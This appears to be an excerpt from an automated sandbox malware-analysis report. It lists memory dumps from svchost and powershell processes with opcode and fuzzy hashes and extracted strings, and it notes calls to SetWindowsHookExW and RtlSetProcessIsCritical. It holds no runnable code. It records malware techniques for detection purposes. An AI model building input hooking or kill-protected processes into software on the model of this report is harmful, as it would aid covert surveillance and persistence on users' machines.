                                                        • Opcode ID: a2931972879a33ffc18dec980890f4c99904d30290883b249b363993a56db74f
                                                        • Instruction ID: b3e9fe751012c2f287febc3f8209369746a64660e6feaeee69846429350e5883
                                                        • Opcode Fuzzy Hash: a2931972879a33ffc18dec980890f4c99904d30290883b249b363993a56db74f
                                                        • Instruction Fuzzy Hash: D412E120F2EA495FEB98FB38945A7B972D2FF98780F540579D00EC32C6DF28A8058745
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 944aa6afb4b577105737974abea393365a3c4371ee2ae1c7c25dc449bdfa684a
                                                        • Instruction ID: 846312e8a9fa30108d68e111fd8960f992caf3465ac61b2697c71222781c5fcf
                                                        • Opcode Fuzzy Hash: 944aa6afb4b577105737974abea393365a3c4371ee2ae1c7c25dc449bdfa684a
                                                        • Instruction Fuzzy Hash: AAF1C03090DA8E8FEBA8EF28DC557E937D1FF54350F14426AE84DC7295CB34A8458B82
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9725331f749f88d2638d106616f8153b4b1c4a4297f9f3618b8e0aee63b8b372
                                                        • Instruction ID: 0cadaca37613b676faec48f046d015708a78e1fd0d536d4982a0a56ed7feb6f7
                                                        • Opcode Fuzzy Hash: 9725331f749f88d2638d106616f8153b4b1c4a4297f9f3618b8e0aee63b8b372
                                                        • Instruction Fuzzy Hash: D5F1D33090DA8E8FEBA8EF28C8557E937E1EF54350F14826ED84DC7291CF3899458B85
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc3ee8bd8cb980aafc137fa6a0e0bc36bfbbd1122e8d2b638c7140022b692662
                                                        • Instruction ID: 5513785641692addae64b4983c853aadcec82ffe595ecd45aa1a4e91d1f54e12
                                                        • Opcode Fuzzy Hash: cc3ee8bd8cb980aafc137fa6a0e0bc36bfbbd1122e8d2b638c7140022b692662
                                                        • Instruction Fuzzy Hash: 38511110B1E6C95FD796AB3858643B67FE1DF87255F1801FBE089C7197DE08080AC356

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CriticalProcess
                                                        • String ID: L_^
                                                        • API String ID: 2695349919-3397556586
                                                        • Opcode ID: 7f15fc1d0a958aa7710aa4c299ee3101af00fcb6f96943d817c01d7cdac30901
                                                        • Instruction ID: 1e5aa662cd27dcc48ea73a45d48000542efe7457c784a824c6d6fd1ea4672f0b
                                                        • Opcode Fuzzy Hash: 7f15fc1d0a958aa7710aa4c299ee3101af00fcb6f96943d817c01d7cdac30901
                                                        • Instruction Fuzzy Hash: DE31F27190CA488FDB28EB69D845BF97BE0FF55311F14412EE09AD3692CB34A846CB91

                                                        Control-flow Graph

                                                         [Control-flow graph rendering omitted; entry block 7ff848da9da8-7ff848da9daf, SetWindowsHookExW called in block 7ff848da9e42-7ff848da9e7f]
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        • Opcode ID: b011d9a75d90caa8d1ae2824be8d5ccba153ca3052a824de62aa8fd2e2145ef5
                                                        • Instruction ID: 89848795b2b6147f9ebb5ecbf257567b535e2904f1c7b18fc1f542ace05fa5f7
                                                        • Opcode Fuzzy Hash: b011d9a75d90caa8d1ae2824be8d5ccba153ca3052a824de62aa8fd2e2145ef5
                                                        • Instruction Fuzzy Hash: 81411530A0DA5D9FDB58EBAC98467F97BE1EB59320F10423ED009C3292CB65A856C7C1

                                                        Control-flow Graph

                                                         [Control-flow graph rendering omitted; entry block 7ff848da9885-7ff848da9960, which calls RtlSetProcessIsCritical]
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CriticalProcess
                                                        • String ID:
                                                        • API String ID: 2695349919-0
                                                        • Opcode ID: 990fd797b3d3a009226b24e07daf569f0bdbbf4c9452134aad3290107c03cede
                                                        • Instruction ID: 5f465cac20b412f019633ac692cc7c4b9d28ced29c5554d1a477f07202524600
                                                        • Opcode Fuzzy Hash: 990fd797b3d3a009226b24e07daf569f0bdbbf4c9452134aad3290107c03cede
                                                        • Instruction Fuzzy Hash: 7441233090DB888FDB19DB6898457F97BF0FF56310F14016FD08AC3592CB246846CB91
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f162219d9cde18b0c9ca851bf16a5327a84746c1039d8ce025e2e47bb52adce5
                                                        • Instruction ID: 32a553278e48e7013e22b29030d878887e0b223c095786b430578705a8175d3f
                                                        • Opcode Fuzzy Hash: f162219d9cde18b0c9ca851bf16a5327a84746c1039d8ce025e2e47bb52adce5
                                                        • Instruction Fuzzy Hash: 28512627A0F179AAD71177FEB4656F97B10EF423B5F0802B7D14D8E0878E04204A86F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2206007959.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (BI$(BI$(BI$(BI$(BI
                                                        • API String ID: 0-2502998277
                                                        • Opcode ID: 591a6de3a5c5471b6eba7362304fa21698c2dd8dc7a81bcde50b1eddbf5634f4
                                                        • Instruction ID: cc4d8f9a153dfef151c49b7b95230a1207c5b16c9fd05947bcededfef8f99418
                                                        • Opcode Fuzzy Hash: 591a6de3a5c5471b6eba7362304fa21698c2dd8dc7a81bcde50b1eddbf5634f4
                                                        • Instruction Fuzzy Hash: 5ED136B1D0EA8A9FEBA9AB6858145B5BBA0FF06790F0401FED40DC70A3DB289C05C355
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2206007959.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8>I
                                                        • API String ID: 0-3840705973
                                                        • Opcode ID: 1ab3630d74ecf9034d84c837407ad40fe7d82f5021909ac7a2ddecb8eff129dd
                                                        • Instruction ID: 880783f4bde7abe47e3227e35860287a8f7591a36455c6cb969da3ca4ea48366
                                                        • Opcode Fuzzy Hash: 1ab3630d74ecf9034d84c837407ad40fe7d82f5021909ac7a2ddecb8eff129dd
                                                        • Instruction Fuzzy Hash: 785145B2E0CA5A4FE7A9EA6C54116B4B7D2FF55264F5801BAC00EC7197DF24EC05834A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2206007959.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: p>I
                                                        • API String ID: 0-3125605735
                                                        • Opcode ID: 5a8bddcaada66ab12cfaa84c182b2957ed4d802807ae038235bcc7b111cd3bd2
                                                        • Instruction ID: fb14e701e18629e5336440b5b15076bb13e01becc9d17f84f6c6c8893c160641
                                                        • Opcode Fuzzy Hash: 5a8bddcaada66ab12cfaa84c182b2957ed4d802807ae038235bcc7b111cd3bd2
                                                        • Instruction Fuzzy Hash: 12415CB2E0D9694FE7A9EB6CA4506B4B7D1FF44764F4801BAC04DC3197DB28AC1183D5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2206007959.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8>I
                                                        • API String ID: 0-3840705973
                                                        • Opcode ID: 22be8906bfffb79a5044b92f1c7a3620bb0e0c65ab3be53e7b0d43de25607a40
                                                        • Instruction ID: 937d043ead44c3657f4525b332e0a1bb739bed6dee438f9bdd8e05501ada471b
                                                        • Opcode Fuzzy Hash: 22be8906bfffb79a5044b92f1c7a3620bb0e0c65ab3be53e7b0d43de25607a40
                                                        • Instruction Fuzzy Hash: 1E2104B2E0D9AB4FE7A9EA6C5550174A2D2FF61394F5901BAC00DC71E2CF28EC14834A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2206007959.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: p>I
                                                        • API String ID: 0-3125605735
                                                        • Opcode ID: acea96f736b984b26349af8b8b4083a90cea597e1f3e939cde55a86ae67059ec
                                                        • Instruction ID: ea51fe2cf5c2f45bc7608b4815c51a15eb67607a056e4c99eeb2fa5e8e3b7067
                                                        • Opcode Fuzzy Hash: acea96f736b984b26349af8b8b4083a90cea597e1f3e939cde55a86ae67059ec
                                                        • Instruction Fuzzy Hash: 131148F2D0D4A64FE6A8F76CA4545B4B7D1FF04794F4800B5C05DC31E6CB28AC508385
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 984475d9de4df1490fc1dc37cc8146c941fc2212bd0cb2c6e825229de054e3f0
                                                        • Instruction ID: 80fadf8ae8dd818ade61fcc29bd63d34d38456cafa2922ede349414150707377
                                                        • Opcode Fuzzy Hash: 984475d9de4df1490fc1dc37cc8146c941fc2212bd0cb2c6e825229de054e3f0
                                                        • Instruction Fuzzy Hash: 1E31862280F6C58FD713A76898766E57F60EF13254F0D01F7D098CF0A7DA181889C366
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4483042e94fcd0621697177dfe13e58d3390fbd90de16d7a10e28acd6f48914
                                                        • Instruction ID: 8d7e9ffb32b97951c84b3831cc76578dca07e3f78bbe7041ab8dc2a51dd60092
                                                        • Opcode Fuzzy Hash: d4483042e94fcd0621697177dfe13e58d3390fbd90de16d7a10e28acd6f48914
                                                        • Instruction Fuzzy Hash: DD31D83191CB489FDB18DF5CA8066B97BE0FB99711F00422FE449D3252CB70A855CBC6
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205003077.00007FF848C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C6D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848c6d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb76e026e75ec0826560002cefd00f469ac6d96bf470397449798352611cb91b
                                                        • Instruction ID: c228f41f07ed721e1d3f0d57ddfc02c4b580cfc54b5b93896310b2f6a754205d
                                                        • Opcode Fuzzy Hash: bb76e026e75ec0826560002cefd00f469ac6d96bf470397449798352611cb91b
                                                        • Instruction Fuzzy Hash: 5A41F07180DBC48FE79ADB2898459523FB0EF52364B2506FFD088CB1A7D625E846C792
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d608fcf59d9a7d9cb06ef83603fd3d66305792a5996526f3d70b6f75184d133f
                                                        • Instruction ID: 81f3672554fa70961cbef2da011b0b5b7517fa56e67c33a3cac8daeffb5d96c0
                                                        • Opcode Fuzzy Hash: d608fcf59d9a7d9cb06ef83603fd3d66305792a5996526f3d70b6f75184d133f
                                                        • Instruction Fuzzy Hash: 3921263190DB4C8FEB59DBAC984A7E97FF0EB96321F04416FD048C3156DA74A44ACB92
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                        • Instruction ID: 224165ec8f45dee36243f959deff86883391830e77b87c6cca6c96d1a77f018c
                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                        • Instruction Fuzzy Hash: A301447111CB084FDB48EF0CE451AA5B7E0FB95364F10056DE58AC3695DB26E882CB45
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a85c70c7ce48270da52231c0f387bb177233594d91c6fb87a3a934cea22a9639
                                                        • Instruction ID: cccfdb48dce313453f4066a68cb8af807b801cd4194d574487dc74404e528b14
                                                        • Opcode Fuzzy Hash: a85c70c7ce48270da52231c0f387bb177233594d91c6fb87a3a934cea22a9639
                                                        • Instruction Fuzzy Hash: DDE0123580894C8FDB54EF18945A5E57BA0FF64301F00429BE81DC7120D7719958CBC2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: N_^$N_^$N_^$N_^
                                                        • API String ID: 0-3900292545
                                                        • Opcode ID: 2644d6157c10e2e5027483473912ded8d8d12a7763f19b334cee903c7135e232
                                                        • Instruction ID: 287800b7871519d338fa4edf798178d7579a3416d13189d0db145493c421334d
                                                        • Opcode Fuzzy Hash: 2644d6157c10e2e5027483473912ded8d8d12a7763f19b334cee903c7135e232
                                                        • Instruction Fuzzy Hash: 7141746390F6D25FE356A3295C79295BFA0EF123D4F0D01F7C5988B0D3EA19240E9356
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: N_^4$N_^7$N_^F$N_^J
                                                        • API String ID: 0-3508309026
                                                        • Opcode ID: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                        • Instruction ID: 894b0531ad91375c26087df6b5dd48309ea519f6f194dd81c7074a9dc38eb10a
                                                        • Opcode Fuzzy Hash: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                        • Instruction Fuzzy Hash: 7C213B7760A0259ED3017BBEBC286E93741EF942B4F4501B2D298CF143EA14718A86E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2310778816.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (BI$(BI$(BI$(BI$(BI$X7O>
                                                        • API String ID: 0-3954831695
                                                        • Opcode ID: 7113b942a00d01aec2296bb010dfda4ce501f2e501d0edc85f77abd893d85bc1
                                                        • Instruction ID: b8f0c8d3cd8637db72dd65d7bbe77b99398e503e3d1bb62977f053070ce63f34
                                                        • Opcode Fuzzy Hash: 7113b942a00d01aec2296bb010dfda4ce501f2e501d0edc85f77abd893d85bc1
                                                        • Instruction Fuzzy Hash: 2DD145B1D0EA8A9FE7A9AB6858155B5BBA0FF16790F0401FFD40DC70A3EB289C05C355
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2310778816.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8>I
                                                        • API String ID: 0-3840705973
                                                        • Opcode ID: 1ab3630d74ecf9034d84c837407ad40fe7d82f5021909ac7a2ddecb8eff129dd
                                                        • Instruction ID: 880783f4bde7abe47e3227e35860287a8f7591a36455c6cb969da3ca4ea48366
                                                        • Opcode Fuzzy Hash: 1ab3630d74ecf9034d84c837407ad40fe7d82f5021909ac7a2ddecb8eff129dd
                                                        • Instruction Fuzzy Hash: 785145B2E0CA5A4FE7A9EA6C54116B4B7D2FF55264F5801BAC00EC7197DF24EC05834A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2310778816.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: p>I
                                                        • API String ID: 0-3125605735
                                                        • Opcode ID: 5a8bddcaada66ab12cfaa84c182b2957ed4d802807ae038235bcc7b111cd3bd2
                                                        • Instruction ID: fb14e701e18629e5336440b5b15076bb13e01becc9d17f84f6c6c8893c160641
                                                        • Opcode Fuzzy Hash: 5a8bddcaada66ab12cfaa84c182b2957ed4d802807ae038235bcc7b111cd3bd2
                                                        • Instruction Fuzzy Hash: 12415CB2E0D9694FE7A9EB6CA4506B4B7D1FF44764F4801BAC04DC3197DB28AC1183D5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2310778816.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8>I
                                                        • API String ID: 0-3840705973
                                                        • Opcode ID: 22be8906bfffb79a5044b92f1c7a3620bb0e0c65ab3be53e7b0d43de25607a40
                                                        • Instruction ID: 937d043ead44c3657f4525b332e0a1bb739bed6dee438f9bdd8e05501ada471b
                                                        • Opcode Fuzzy Hash: 22be8906bfffb79a5044b92f1c7a3620bb0e0c65ab3be53e7b0d43de25607a40
                                                        • Instruction Fuzzy Hash: 1E2104B2E0D9AB4FE7A9EA6C5550174A2D2FF61394F5901BAC00DC71E2CF28EC14834A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2310778816.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: p>I
                                                        • API String ID: 0-3125605735
                                                        • Opcode ID: acea96f736b984b26349af8b8b4083a90cea597e1f3e939cde55a86ae67059ec
                                                        • Instruction ID: ea51fe2cf5c2f45bc7608b4815c51a15eb67607a056e4c99eeb2fa5e8e3b7067
                                                        • Opcode Fuzzy Hash: acea96f736b984b26349af8b8b4083a90cea597e1f3e939cde55a86ae67059ec
                                                        • Instruction Fuzzy Hash: 131148F2D0D4A64FE6A8F76CA4545B4B7D1FF04794F4800B5C05DC31E6CB28AC508385
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2309707248.00007FF848D85000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D85000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848d85000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 98eda71ee9a65ddb5fc2d1b7260c07b6050e1a509c170c05d7c7005f51734942
                                                        • Instruction ID: a3f7b0b407607905ddb1056608a91a15a20c4fdd5643f11da5341a4f276dbe8d
                                                        • Opcode Fuzzy Hash: 98eda71ee9a65ddb5fc2d1b7260c07b6050e1a509c170c05d7c7005f51734942
                                                        • Instruction Fuzzy Hash: 6831073191CB889FDB199F1CAC066B97BE1FB99310F00426FE449D3252CA70A816CBC6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2308339021.00007FF848C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C6D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848c6d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1c0bc5ad086b7fdb4d11167cb596ccce2f8b6bce99d0777ecb724a1e0a9b99b
                                                        • Instruction ID: 4883db4e1d891ba4794608a3cde302763ece405fd3e00626cc7fecf321da531b
                                                        • Opcode Fuzzy Hash: e1c0bc5ad086b7fdb4d11167cb596ccce2f8b6bce99d0777ecb724a1e0a9b99b
                                                        • Instruction Fuzzy Hash: D541F57180DBC48FD796DB3898559523FF0EF57260B1905EFD088CB1A3D625A84AC7A3
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2309707248.00007FF848D85000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D85000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848d85000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 209eee998badf9f355c8d5e2c67267c76fcbc32f1a9350919e410699c69b3d8d
                                                        • Instruction ID: 37a785cf7bcd15544bee91216a2fb25c054efc4a2e4b9879ed7bf70e42825f95
                                                        • Opcode Fuzzy Hash: 209eee998badf9f355c8d5e2c67267c76fcbc32f1a9350919e410699c69b3d8d
                                                        • Instruction Fuzzy Hash: E421F83190CB4C4FDB59DFAC984A7E97BE0EB96331F04426BD048C3152D674A85ACB92
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2309707248.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 460e0a9e5075c78f145e788717bba8ca58fba773285f7101c0b852d045b565cb
                                                        • Instruction ID: 4e626b9e1d5433567e41159e2e393c7ee29c457bf33c6094258378f34ff63c53
                                                        • Opcode Fuzzy Hash: 460e0a9e5075c78f145e788717bba8ca58fba773285f7101c0b852d045b565cb
                                                        • Instruction Fuzzy Hash: 61A17826B0A5269ED701BB7DB8562F83B61FF863E1F0405B7C148CB097CA35648AC7E5
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6a25bd0d4c92ead908cd6e53b53c293870e0b0c49da6d329925aa438ad15db2
                                                        • Instruction ID: 208f57590e6a9cd87ab929b3b4f8162b5dedccd33d997649002a95887d3ad1ab
                                                        • Opcode Fuzzy Hash: f6a25bd0d4c92ead908cd6e53b53c293870e0b0c49da6d329925aa438ad15db2
                                                        • Instruction Fuzzy Hash: E2918526B0A91A9ED700BB7DB8062F83BA1FF853F1F444577C148CB197CA25648AC7E4
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c18af7c0492566c1f46bf5c2fe9324992be07cf3febe9af8e1617030369b214c
                                                        • Instruction ID: 2ff1b399997baec32836eec9850189cf5472df50193e7b5e44a594c9375914cb
                                                        • Opcode Fuzzy Hash: c18af7c0492566c1f46bf5c2fe9324992be07cf3febe9af8e1617030369b214c
                                                        • Instruction Fuzzy Hash: 28819626B0A91AAED701BB7DB8062F93BA1FF853E1F444577C108C7197CA35648AC7E4
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 666e31cf5c550ba2c6b5acbfb69a6d405ac52ff45391de368ce1917549be4db5
                                                        • Instruction ID: dc52735ce656cb43a42313f854f3c2f9a4ac0ca45134dad53ae7b008880edb2a
                                                        • Opcode Fuzzy Hash: 666e31cf5c550ba2c6b5acbfb69a6d405ac52ff45391de368ce1917549be4db5
                                                        • Instruction Fuzzy Hash: 60818726B0A91A9ED700BB7DB8062F93BA1FF853E1F444577C108C7197CA35648AC7E4
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0fa892dd33dcb35560550761bbe15fc260982d22d749a94386522138e516c17b
                                                        • Instruction ID: 5e888793d9e8fbd2a8a935457472b9e42c612e07f8cd3d3d8ff8df8c6cc07d24
                                                        • Opcode Fuzzy Hash: 0fa892dd33dcb35560550761bbe15fc260982d22d749a94386522138e516c17b
                                                        • Instruction Fuzzy Hash: 1C716726B0A91AAED701BB7DB4162F93BA1FF853E1F440576C108C7197CA35648AC7E4
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
